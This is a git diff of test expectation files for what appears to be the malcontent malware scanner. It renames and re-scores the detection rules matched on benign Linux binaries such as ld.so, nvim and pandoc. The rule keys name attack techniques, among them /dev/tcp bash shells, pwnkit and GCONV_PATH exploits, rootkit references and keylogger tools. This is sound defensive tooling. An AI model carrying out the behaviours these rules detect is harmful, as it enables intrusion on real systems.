b/tests/linux/clean/default_config.json.simple @@ -20,7 +20,7 @@ data/compression/bzip2: low data/compression/lzma: low data/compression/zstd: low data/encoding/base64: low -discover/system/network: high +discover/system/network: medium discover/system/platform: low discover/user/name_get: medium evasion/bypass_security/linux/iptables: medium @@ -29,7 +29,6 @@ evasion/file/prefix: medium evasion/logging/acct: low evasion/process_injection/readelf: medium exec/plugin: low -exec/shell/bash_dev_tcp: high exec/shell/bash_dev_udp: medium exec/shell/nohup: medium exec/system_controls/apparmor: medium @@ -55,6 +54,7 @@ impact/exploit/cve: medium impact/remote_access/iptables: medium net/dns/servers: low net/download: medium +net/ftp/t: low net/http/cookies: medium net/socket/connect: medium net/tcp/sftp: medium diff --git a/tests/linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json.simple b/tests/linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json.simple index 2fcc182fe..43b73b57d 100644 --- a/tests/linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json.simple +++ b/tests/linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json.simple @@ -1,7 +1,6 @@ # linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json: medium 3P/threat_hunting/seclists: medium impact/exploit: medium -impact/exploit/GCONV_PATH: low impact/exploit/cve: medium impact/exploit/pwnkit: low impact/remote_access/agent: medium diff --git a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple index 59d257440..89da6b666 100644 --- a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple +++ b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple @@ -52,8 +52,8 @@ data/encoding/json_decode: low data/encoding/json_encode: low data/hash/md5: low discover/network/mac_address: medium -discover/process/name_get: medium -discover/process/parent_pid_get: low +discover/process/name: medium +discover/process/parent: low evasion/file/prefix: medium evasion/rootkit/refs: medium exec/cmd: medium diff --git a/tests/linux/clean/kuma-cp.simple b/tests/linux/clean/kuma-cp.simple index e81ca191a..6477bb5ab 100644 --- a/tests/linux/clean/kuma-cp.simple +++ b/tests/linux/clean/kuma-cp.simple @@ -3,7 +3,7 @@ 3P/threat_hunting/privilegeescalation: medium c2/addr/http_dynamic: medium c2/addr/ip: medium -c2/server_address: medium +c2/addr/server: medium c2/tool_transfer/download: medium collect/archives/zip: medium collect/databases/mysql: medium diff --git a/tests/linux/clean/ld-2.27.so.simple b/tests/linux/clean/ld-2.27.so.simple index 935e4f3f4..2b9e1489a 100644 --- a/tests/linux/clean/ld-2.27.so.simple +++ b/tests/linux/clean/ld-2.27.so.simple @@ -2,6 +2,7 @@ anti-behavior/LD_DEBUG: medium anti-behavior/LD_PROFILE: medium discover/process/runtime_deps: medium +discover/system/dev_full: medium evasion/hijack_execution/LD_LIBRARY_PATH: low evasion/hijack_execution/etc_ld.so.preload: medium fs/path/etc: low @@ -10,7 +11,7 @@ fs/path/var_profile: medium fs/proc/self_exe: medium fs/proc/sys_kernel_osrelease: medium fs/tempdir: low -impact/exploit/GCONV_PATH: low +hw/dev/ubi: low net/url/embedded: low persist/shell/bash: medium sus/exclamation: medium diff --git a/tests/linux/clean/libgcj.so.17.0.0.simple b/tests/linux/clean/libgcj.so.17.0.0.simple index 6d80a5ff9..6fe699be2 100644 --- a/tests/linux/clean/libgcj.so.17.0.0.simple +++ b/tests/linux/clean/libgcj.so.17.0.0.simple @@ -18,13 +18,14 @@ data/hash/sha1: low data/hash/sha256: low data/hash/whirlpool: medium discover/network/interface_list: medium -discover/process/name_get: medium +discover/process/name: medium discover/system/cpu_info: low discover/system/hostname_get: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low evasion/hijack_execution/LD_LIBRARY_PATH: low +evasion/process_injection/ptrace: low exec/cmd: medium exec/conditional/LANG: low exec/dylib/address_check: low @@ -51,7 +52,6 @@ fs/path/var: low fs/permission/modify: medium fs/proc/arbitrary_pid: medium fs/proc/mounts: medium -fs/proc/pid_exe: medium fs/proc/stat: medium fs/tempdir: low fs/tempdir/TEMP: low diff --git a/tests/linux/clean/libgcj.so.17.simple b/tests/linux/clean/libgcj.so.17.simple index 62cf9ab5c..1ee600a0a 100644 --- a/tests/linux/clean/libgcj.so.17.simple +++ b/tests/linux/clean/libgcj.so.17.simple @@ -18,13 +18,14 @@ data/hash/sha1: low data/hash/sha256: low data/hash/whirlpool: medium discover/network/interface_list: medium -discover/process/name_get: medium +discover/process/name: medium discover/system/cpu_info: low discover/system/hostname_get: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low evasion/hijack_execution/LD_LIBRARY_PATH: low +evasion/process_injection/ptrace: low exec/cmd: medium exec/conditional/LANG: low exec/dylib/address_check: low @@ -51,7 +52,6 @@ fs/path/var: low fs/permission/modify: medium fs/proc/arbitrary_pid: medium fs/proc/mounts: medium -fs/proc/pid_exe: medium fs/proc/stat: medium fs/tempdir: low fs/tempdir/TEMP: low diff --git a/tests/linux/clean/libsystemd.so.0.simple b/tests/linux/clean/libsystemd.so.0.simple index 936565b97..a45fb292c 100644 --- a/tests/linux/clean/libsystemd.so.0.simple +++ b/tests/linux/clean/libsystemd.so.0.simple @@ -1,7 +1,7 @@ # linux/clean/libsystemd.so.0: medium data/compression/lzma: low data/random/insecure: low -discover/process/parent_pid_get: low +discover/process/parent: low discover/process/runtime_deps: medium discover/user/USER: low evasion/file/location/var_run: medium diff --git a/tests/linux/clean/ls.x86_64.md b/tests/linux/clean/ls.x86_64.md index fe3d4731f..ffd6be373 100644 --- a/tests/linux/clean/ls.x86_64.md +++ b/tests/linux/clean/ls.x86_64.md @@ -7,5 +7,6 @@ | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | +| LOW | [hw/dev/ubi](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/ubi.yara#expected_ubi_users) | expected ubi users | [Usage:](https://github.com/search?q=Usage%3A&type=code) | | LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | diff --git a/tests/linux/clean/lslogins.md b/tests/linux/clean/lslogins.md index ede252252..cf3dff5a7 100644 --- a/tests/linux/clean/lslogins.md +++ b/tests/linux/clean/lslogins.md @@ -21,6 +21,7 @@ | LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/log/btmp](https://github.com/search?q=%2Fvar%2Flog%2Fbtmp&type=code)
[/var/log/lastlog](https://github.com/search?q=%2Fvar%2Flog%2Flastlog&type=code)
[/var/log/wtmp](https://github.com/search?q=%2Fvar%2Flog%2Fwtmp&type=code)
[/var/run/nologin](https://github.com/search?q=%2Fvar%2Frun%2Fnologin&type=code) | | LOW | [fs/tempdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir.yara#tempdir) | looks up location of temp directory | [TMPDIR](https://github.com/search?q=TMPDIR&type=code) | | LOW | [fs/tempdir/TMPDIR](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TMPDIR.yara#TMPDIR) | TMPDIR | [TMPDIR](https://github.com/search?q=TMPDIR&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [hw/dev/ubi](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/ubi.yara#expected_ubi_users) | expected ubi users | [Usage:](https://github.com/search?q=Usage%3A&type=code) | | LOW | [os/fd/sendfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/sendfile.yara#sendfile) | [transfer data between file descriptors](https://man7.org/linux/man-pages/man2/sendfile.2.html) | [sendfile](https://github.com/search?q=sendfile&type=code) | | LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setregid) | set real and effective group ID of process | [setregid](https://github.com/search?q=setregid&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/mongosh.simple b/tests/linux/clean/mongosh.simple index cd28c793c..b1601c57a 100644 --- a/tests/linux/clean/mongosh.simple +++ b/tests/linux/clean/mongosh.simple @@ -4,8 +4,8 @@ anti-static/obfuscation/hex: medium anti-static/obfuscation/obfuscate: low c2/addr/http_dynamic: medium c2/addr/ip: medium +c2/addr/server: medium c2/discovery/ip_dns_resolver: medium -c2/server_address: medium collect/archives/unarchive: medium collect/databases/postgresql: medium collect/databases/sqlite: medium @@ -39,8 +39,8 @@ discover/group/lookup: medium discover/network/interface_get: low discover/network/interface_list: medium discover/network/mac_address: medium -discover/process/name_get: medium -discover/process/parent_pid_get: low +discover/process/name: medium +discover/process/parent: low discover/processes/list: medium discover/system/hostname_get: low discover/system/platform: medium diff --git a/tests/linux/clean/nvim.simple b/tests/linux/clean/nvim.simple index 71aa9e4b5..7d856fd17 100644 --- a/tests/linux/clean/nvim.simple +++ b/tests/linux/clean/nvim.simple @@ -1,7 +1,6 @@ # linux/clean/nvim: medium 3P/threat_hunting/hrshell: medium c2/addr/server: medium -c2/server_address: medium collect/databases/mysql: medium collect/databases/sqlite: medium credential/cloud/aws: medium diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md index d707b5e2f..609fc4915 100644 --- a/tests/linux/clean/pandoc.md +++ b/tests/linux/clean/pandoc.md @@ -6,8 +6,8 @@ | MEDIUM | [3P/threat_hunting/keylogger](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#keylogger_keyword_offensive_tool_keyword) | [references 'keylogger keyword' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [KeyLogger](https://github.com/search?q=KeyLogger&type=code) | | MEDIUM | [3P/threat_hunting/slowloris](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#SlowLoris_offensive_tool_keyword) | [references 'SlowLoris' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [Slowloris](https://github.com/search?q=Slowloris&type=code) | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bindPort](https://github.com/search?q=bindPort&type=code)
[blIp](https://github.com/search?q=blIp&type=code)
[client_ip](https://github.com/search?q=client_ip&type=code)
[client_port](https://github.com/search?q=client_port&type=code)
[config_port](https://github.com/search?q=config_port&type=code)
[curlopt_port](https://github.com/search?q=curlopt_port&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[domain_port](https://github.com/search?q=domain_port&type=code)
[eIp](https://github.com/search?q=eIp&type=code)
[ereghet_ip](https://github.com/search?q=ereghet_ip&type=code)
[framed_ip](https://github.com/search?q=framed_ip&type=code)
[ftp_port](https://github.com/search?q=ftp_port&type=code)
[gamhet_ip](https://github.com/search?q=gamhet_ip&type=code)
[getPort](https://github.com/search?q=getPort&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[gomphet_ip](https://github.com/search?q=gomphet_ip&type=code)
[host_ip](https://github.com/search?q=host_ip&type=code)
[http_port](https://github.com/search?q=http_port&type=code)
[internal_ip](https://github.com/search?q=internal_ip&type=code)
[ipproto_ip](https://github.com/search?q=ipproto_ip&type=code)
[is_port](https://github.com/search?q=is_port&type=code)
[lat_port](https://github.com/search?q=lat_port&type=code)
[lloghet_ip](https://github.com/search?q=lloghet_ip&type=code)
[lnormhet_ip](https://github.com/search?q=lnormhet_ip&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[local_port](https://github.com/search?q=local_port&type=code)
[login_ip](https://github.com/search?q=login_ip&type=code)
[mIp](https://github.com/search?q=mIp&type=code)
[nas_ip](https://github.com/search?q=nas_ip&type=code)
[nas_port](https://github.com/search?q=nas_port&type=code)
[open_port](https://github.com/search?q=open_port&type=code)
[pg_port](https://github.com/search?q=pg_port&type=code)
[primary_ip](https://github.com/search?q=primary_ip&type=code)
[primary_port](https://github.com/search?q=primary_port&type=code)
[proxyPort](https://github.com/search?q=proxyPort&type=code)
[radius_port](https://github.com/search?q=radius_port&type=code)
[sam_port](https://github.com/search?q=sam_port&type=code)
[serverPort](https://github.com/search?q=serverPort&type=code)
[server_port](https://github.com/search?q=server_port&type=code)
[setPort](https://github.com/search?q=setPort&type=code)
[socketPort](https://github.com/search?q=socketPort&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[uriPort](https://github.com/search?q=uriPort&type=code)
[url_port](https://github.com/search?q=url_port&type=code)
[validate_ip](https://github.com/search?q=validate_ip&type=code)
[weibhet_ip](https://github.com/search?q=weibhet_ip&type=code)
[xIp](https://github.com/search?q=xIp&type=code) | +| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [inet_server_addr](https://github.com/search?q=inet_server_addr&type=code) | | MEDIUM | [c2/discovery/dyndns](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/dyndns.yara#dynamic_dns_user) | dynamic dns user | [dyndns](https://github.com/search?q=dyndns&type=code) | -| MEDIUM | [c2/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/server_address.yara#server_address) | references a 'server address', possible C2 client | [inet_server_addr](https://github.com/search?q=inet_server_addr&type=code) | | MEDIUM | [collect/archives/unarchive](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/unarchive.yara#unarchive) | unarchives files | [unarchived](https://github.com/search?q=unarchived&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [ZIP64](https://github.com/search?q=ZIP64&type=code) | | MEDIUM | [collect/databases/mysql](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/mysql.yara#mysql) | accesses MySQL databases | [mysql](https://github.com/search?q=mysql&type=code) | @@ -21,7 +21,7 @@ | MEDIUM | [discover/group/lookup](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/group/lookup.yara#getgrent) | get entry from group database | [endgrent](https://github.com/search?q=endgrent&type=code)
[getgrent](https://github.com/search?q=getgrent&type=code)
[setgrent](https://github.com/search?q=setgrent&type=code) | | MEDIUM | [discover/network/netstat](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/netstat.yara#netstat) | Uses 'netstat' for network information | [netstat](https://github.com/search?q=netstat&type=code) | | MEDIUM | [discover/process/effective_groupid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/effective-groupid-get.yara#php_getmygid) | returns the effective group id of the current process | [getmygid](https://github.com/search?q=getmygid&type=code) | -| MEDIUM | [discover/process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | +| MEDIUM | [discover/process/name](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | | MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | | MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [CmdForListBodyStartCmd](https://github.com/search?q=CmdForListBodyStartCmd&type=code)
[SystemziProcess_runCommand1_closure](https://github.com/search?q=SystemziProcess_runCommand1_closure&type=code)
[SystemziProcess_runCommand1_info](https://github.com/search?q=SystemziProcess_runCommand1_info&type=code)
[SystemziProcess_runCommand2_closure](https://github.com/search?q=SystemziProcess_runCommand2_closure&type=code)
[SystemziProcess_runCommand3_bytes](https://github.com/search?q=SystemziProcess_runCommand3_bytes&type=code)
[SystemziProcess_runCommand_closure](https://github.com/search?q=SystemziProcess_runCommand_closure&type=code)
[SystemziProcess_runCommand_info](https://github.com/search?q=SystemziProcess_runCommand_info&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code) | @@ -89,7 +89,7 @@ | LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) | | LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | | LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) | -| LOW | [discover/process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | +| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [discover/system/cpu_info](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [discover/system/machine_id](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/machine_id.yara#machineid) | Gets a unique machineid for the host | [machineid](https://github.com/search?q=machineid&type=code) | @@ -97,6 +97,7 @@ | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) | +| LOW | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#known_ptrace_injectors) | known ptrace injectors | [BPF](https://github.com/search?q=BPF&type=code) | | LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [LANG](https://github.com/search?q=LANG&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | | LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Plugin_Abstract](https://github.com/search?q=Plugin_Abstract&type=code)
[QAccessiblePlugin](https://github.com/search?q=QAccessiblePlugin&type=code)
[QAudioSystemPlugin](https://github.com/search?q=QAudioSystemPlugin&type=code)
[QGenericPluginFactory](https://github.com/search?q=QGenericPluginFactory&type=code)
[QIconEnginePlugin](https://github.com/search?q=QIconEnginePlugin&type=code)
[QImageIOPlugin](https://github.com/search?q=QImageIOPlugin&type=code)
[QMediaServiceProviderPlugin](https://github.com/search?q=QMediaServiceProviderPlugin&type=code)
[QPictureFormatPlugin](https://github.com/search?q=QPictureFormatPlugin&type=code)
[QPluginLoader](https://github.com/search?q=QPluginLoader&type=code)
[QQmlEngineExtensionPlugin](https://github.com/search?q=QQmlEngineExtensionPlugin&type=code)
[QQmlExtensionPlugin](https://github.com/search?q=QQmlExtensionPlugin&type=code)
[QScriptExtensionPlugin](https://github.com/search?q=QScriptExtensionPlugin&type=code)
[QSqlDriverPlugin](https://github.com/search?q=QSqlDriverPlugin&type=code)
[QStaticPlugin](https://github.com/search?q=QStaticPlugin&type=code)
[QStylePlugin](https://github.com/search?q=QStylePlugin&type=code)
[QTextToSpeechPlugin](https://github.com/search?q=QTextToSpeechPlugin&type=code)
[QVirtualKeyboardExtensionPlugin](https://github.com/search?q=QVirtualKeyboardExtensionPlugin&type=code)
[addCorePlugin_closure](https://github.com/search?q=addCorePlugin_closure&type=code)
[addCorePlugin_info](https://github.com/search?q=addCorePlugin_info&type=code)
[enabledPlugin](https://github.com/search?q=enabledPlugin&type=code)
[js plugins](https://github.com/search?q=js+plugins&type=code)
[msession_plugin](https://github.com/search?q=msession_plugin&type=code)
[mysqlnd_uh_server_option_plugin_dir](https://github.com/search?q=mysqlnd_uh_server_option_plugin_dir&type=code)
[plugin_abstract](https://github.com/search?q=plugin_abstract&type=code)
[plugin_path](https://github.com/search?q=plugin_path&type=code)
[qAddCorePlugin_closure](https://github.com/search?q=qAddCorePlugin_closure&type=code)
[qAddCorePlugin_info](https://github.com/search?q=qAddCorePlugin_info&type=code) | diff --git a/tests/linux/clean/pulumi.simple b/tests/linux/clean/pulumi.simple index f881eac07..e1f07cb35 100644 --- a/tests/linux/clean/pulumi.simple +++ b/tests/linux/clean/pulumi.simple @@ -3,7 +3,7 @@ 3P/threat_hunting/sharppack: medium c2/addr/http_dynamic: medium c2/addr/ip: medium -c2/server_address: medium +c2/addr/server: medium c2/tool_transfer/download: medium collect/archives/zip: medium collect/databases/mysql: medium @@ -38,7 +38,7 @@ discover/cloud/google_metadata: low discover/cloud/google_storage: low discover/group/lookup: medium discover/network/mac_address: medium -discover/process/parent_pid_get: low +discover/process/parent: low discover/processes/list: medium discover/system/cpu_info: low discover/system/hostname_get: low diff --git a/tests/linux/clean/qemu-system-xtensa.md b/tests/linux/clean/qemu-system-xtensa.md index 36b975a5a..a3b559e84 100644 --- a/tests/linux/clean/qemu-system-xtensa.md +++ b/tests/linux/clean/qemu-system-xtensa.md @@ -1,98 +1,99 @@ ## linux/clean/qemu-system-xtensa [🛑 HIGH] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|--------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------